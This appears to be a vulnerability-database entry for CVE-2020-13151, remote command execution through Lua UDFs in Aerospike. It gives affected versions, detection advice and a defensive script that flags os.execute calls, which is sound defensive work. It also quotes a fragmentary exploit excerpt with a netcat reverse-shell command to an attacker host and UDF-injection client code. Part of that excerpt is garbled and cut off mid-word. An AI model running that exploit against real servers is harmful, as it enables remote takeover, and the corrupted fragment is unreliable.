CVE-2020-13151
Published 2020-08-05
Priority: P1 85 · critical · 9.8 (CVSS 3.1)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Exploit available · EPSS 86.75% (99.7th percentile)
Aerospike Community Edition 4.9.0.5 allows for unauthenticated submission and execution of user-defined functions (UDFs), written in Lua, as part of a database query. It attempts to restrict code execution by disabling os.execute() calls, but this is insufficient. Anyone with network access can use a crafted UDF to execute arbitrary OS commands on all nodes of the cluster at the permission level of the user running the Aerospike service.
Affected (6 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| aerospike | aerospike_server | < 4.5.3.21 | 4.5.3.21 |
| aerospike | aerospike_server | >= 4.6.0.1 < 4.6.0.19 | 4.6.0.19 |
| aerospike | aerospike_server | >= 4.7.0.1 < 4.7.0.17 | 4.7.0.17 |
| aerospike | aerospike_server | >= 4.8.0.1 < 4.8.0.13 | 4.8.0.13 |
| aerospike | aerospike_server | >= 4.9.0.1 < 4.9.0.10 | 4.9.0.10 |
| aerospike | aerospike_server | >= 5.0.0.1 < 5.0.0.7 | 5.0.0.7 |
Detection & IOCs (extracted from sources)
- Monitor the Aerospike service (default port 3000/TCP) for unauthenticated UDF registration and execution requests, particularly submissions of Lua scripts invoking os.execute().
- Detect UDF registration calls (udf_put) followed immediately by apply() calls referencing a module named 'poc' and function 'runCMD' — a strong indicator of CVE-2020-13151 exploitation.
- Alert on Aerospike UDF Lua scripts containing os.execute() calls submitted over the wire; the vulnerability bypasses the intended restriction of this function.
- Flag creation of files under /tmp (e.g., /tmp/ft) or writes to /root/.ssh/authorized_keys by the Aerospike service process, as these are post-exploitation artifacts from known PoC payloads.
- Correlate network connections from the Aerospike service process to external IPs/ports as indicators of reverse shell callbacks (both Python and netcat shells are supported by the public PoC).
- The Metasploit module targets Aerospike Community Edition without authentication; detect exploitation attempts against CE deployments on port 3000 where no auth is configured.
- GreyNoise is actively tagging IPs observed exploiting CVE-2020-13151; enrich alerts on inbound connections to port 3000 with GreyNoise context to identify known malicious scanners.
- The exploit PoC defaults the Aerospike namespace to 'test' and the record set name to 'cve202013151'; real-world attackers may override these with --namespace and --setname arguments, so detection should not rely solely on these default values.
- The Metasploit module was tested against Aerospike Community Edition 4.9.0.5, 4.9.0.11, and 5.0.0.10 on Ubuntu; the fix was introduced in version 5.1.0.3, so only versions prior to that are vulnerable.
- The PoC uses a random 16-character alphanumeric string as the dummy record key by default, making the key value an unreliable detection signal.
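The third bullet above (alerting on UDF sources that call os.execute) can be enforced at the point where a UDF is reviewed before registration, or run over a captured udf_put payload. The following is an added example, not code from this record, the PoC or Aerospike; the two Lua UDF sources are constructed samples.

```python
import re

# Added example (not the advisory's, Aerospike's or the PoC's code): flag os.execute
# calls in a Lua UDF source before it is accepted for registration, or when reviewing
# a captured udf_put payload. Comments are removed first, keeping the newline count,
# so a commented-out mention is not reported and line numbers stay correct.

_BLOCK_COMMENT = re.compile(r"--\[(=*)\[.*?\]\1\]", re.S)
_LINE_COMMENT = re.compile(r"--[^\n]*")
# os.execute followed by a Lua call opener: "(", a quoted string, or a long bracket [[
_OS_EXECUTE_CALL = re.compile(r"\bos\s*\.\s*execute\s*(?:\(|\"|'|\[=*\[)")

def strip_lua_comments(src: str) -> str:
    """Remove Lua block and line comments without changing the line count."""
    src = _BLOCK_COMMENT.sub(lambda m: "\n" * m.group(0).count("\n"), src)
    return _LINE_COMMENT.sub("", src)

def find_os_execute(src: str) -> list[tuple[int, str]]:
    """Return (line_number, stripped line) for each line that calls os.execute."""
    hits = []
    for n, line in enumerate(strip_lua_comments(src).splitlines(), start=1):
        if _OS_EXECUTE_CALL.search(line):
            hits.append((n, line.strip()))
    return hits

def udf_is_safe(src: str) -> bool:
    """True when no os.execute call is found (string-assembled calls still need review)."""
    return not find_os_execute(src)

# Constructed sample UDFs (not from the page): a benign record function and one that shells out.
BENIGN_UDF = """-- returns one bin of the record
function get_bin(rec, name)
  return rec[name]
end
"""

SUSPICIOUS_UDF = """--[[ header comment, mentions
 os.execute("...") but is not a call ]]
function run(rec, cmd)
  local rc = os.execute(cmd)  -- shell access from inside the database process
  return rc
end
"""

if __name__ == "__main__":
    for name, src in (("benign", BENIGN_UDF), ("suspicious", SUSPICIOUS_UDF)):
        print(name, "safe" if udf_is_safe(src) else find_os_execute(src))
```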
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | 3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| NVD | 2.0 | 10.0 | CRITICAL | AV:N/AC:L/Au:N/C:C/I:C/A:C |
No detection rules found.
Exploit-DB
Aerospike Database 5.1.0.3 - OS Command Execution (exploitdb · 2020-11-17 · CVSS 9.8 · CRITICAL)
---
```python
# Exploit Title: Aerospike Database 5.1.0.3 - OS Command Execution
# Date: 2020-08-01
# Exploit Author: Matt S
# Vendor Homepage: https://www.aerospike.com/
# Version: &1|nc {ip} {port} >/tmp/ft&'
def _get_client(cfg):
    try:
        return aerospike.client({
            'hosts': [(cfg.ahost, cfg.aport)],
            'policies': {'timeout': 8000}}).connect()
    except Exception as e:
        print(f"unable to access cluster @ {cfg.ahost}:{cfg.aport}\n{e.msg}")
def _send(client, cfg, _cmd):
    try:
        print(client.apply((cfg.namespace, cfg.setname, cfg.dummystring), 'poc', 'runCMD', [_cmd]))
    except Exception as e:
        print(f"[-] UDF execution returned {e.msg}")
def _register_udf(client, cfg):
    try:
        client.udf_put(cfg.udfpath)
    except Exception as e:
        print(f"[-] whoops, couldn't registe
```
Metasploit
Aerospike Database UDF Lua Code Execution
Aerospike Database versions before 5.1.0.3 permitted user-defined functions (UDF) to call the `os.execute` Lua function. This module creates a UDF utilising this function to execute arbitrary operating system commands with the privileges of the user running the Aerospike service. This module does not support authentication; however, Aerospike Database Community Edition does not enable authentication by default. This module has been tested successfully on Ubuntu with Aerospike Database Community Edition versions 4.9.0.5, 4.9.0.11 and 5.0.0.10.
References
- http://packetstormsecurity.com/files/160106/Aerospike-Database-5.1.0.3-Remote-Command-Execution.html
- http://packetstormsecurity.com/files/160451/Aerospike-Database-UDF-Lua-Code-Execution.html
- https://b4ny4n.github.io/network-pentest/2020/08/01/cve-2020-13151-poc-aerospike.html
- https://www.aerospike.com/docs/operations/configure/security/access-control/index.html#create-users-and-assign-roles
- https://www.aerospike.com/download/server/notes.html#5.1.0.3
- https://www.aerospike.com/enterprise/download/server/notes.html#5.1.0.3